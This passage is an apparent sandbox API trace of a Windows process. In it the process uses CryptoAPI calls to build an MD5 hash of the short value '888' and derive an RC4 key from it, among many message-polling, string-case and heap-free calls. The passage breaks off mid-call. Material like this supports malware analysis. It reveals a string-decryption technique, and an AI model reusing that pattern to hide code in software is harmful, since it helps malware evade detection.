dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0211.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0211.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7040, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0211.887] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bcd0) returned 1 [0211.887] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.888] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0211.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.888] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0211.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.888] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.888] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.889] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0211.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.889] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0211.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.889] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.889] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.889] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.889] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.889] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.889] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.889] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.889] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.889] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.890] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.890] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.890] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.890] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.890] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.890] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.890] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.890] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.890] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.890] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.890] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.890] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.890] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.890] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab278, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0211.891] CryptCreateHash (in: hProv=0xa7bcd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0211.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.891] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0211.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.891] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.891] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.891] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.891] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.891] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.891] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0211.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab3b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0211.892] CryptHashData (hHash=0x9e1cf8, pbData=0x2a71cb8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0211.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.892] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.892] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.892] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.892] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.892] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.892] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.892] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.892] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.892] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.892] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab320, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0211.892] CryptDeriveKey (in: hProv=0xa7bcd0, Algid=0x6601, hBaseData=0x9e1cf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0211.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.893] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.893] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.893] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.893] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.893] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0211.893] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0211.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fa0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0211.893] CryptDestroyHash (hHash=0x9e1cf8) returned 1 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0211.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0211.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0211.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0211.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0211.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ff0 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: 